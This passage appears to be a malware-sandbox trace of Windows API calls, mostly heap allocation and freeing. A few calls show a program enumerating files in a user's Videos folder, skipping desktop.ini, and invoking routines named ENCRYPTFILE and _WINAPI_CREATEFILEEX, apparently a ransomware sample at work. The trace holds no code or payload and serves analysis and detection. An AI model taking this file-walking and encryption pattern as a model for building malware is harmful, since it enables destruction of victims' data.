[0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0096.313] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.313] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.313] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdbdaf4c0, ftCreationTime.dwHighDateTime=0x1d5f099, ftLastAccessTime.dwLowDateTime=0x91451210, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x91451210, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="KW4s-- cgXZEZC", cAlternateFileName="KW4S--~1")) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.314] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.314] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.314] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.314] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.314] FindNextFileW (in: hFindFile=0x41ac700, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2200, ftCreationTime.dwHighDateTime=0x144eff0, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2200, ftLastWriteTime.dwLowDateTime=0x43e9818, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="", cAlternateFileName="敖мńဓ+\x10")) returned 0 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.315] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0096.315] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.315] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.315] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|-frmf8je.swf|desktop.ini", cchCount1=25, lpString2="", cchCount2=0) returned 3 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.316] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0096.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2170 | out: hHeap=0x1780000) returned 1 [0096.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0096.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0096.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0096.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0096.317] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0096.317] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\-frmf8je.swf", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca44c10, ftCreationTime.dwHighDateTime=0x1d5e81e, ftLastAccessTime.dwLowDateTime=0x42d38240, ftLastAccessTime.dwHighDateTime=0x1d5e55b, ftLastWriteTime.dwLowDateTime=0x42d38240, ftLastWriteTime.dwHighDateTime=0x1d5e55b, nFileSizeHigh=0x0, nFileSizeLow=0xcc1f, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="-frmf8je.swf", cAlternateFileName="")) returned 0x41ac2c0 [0096.317] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0096.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0096.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0096.317] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0096.317] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0096.318] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0096.318] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0096.318] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2170 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c08 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0096.319] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0096.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0096.368] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0096.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0096.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 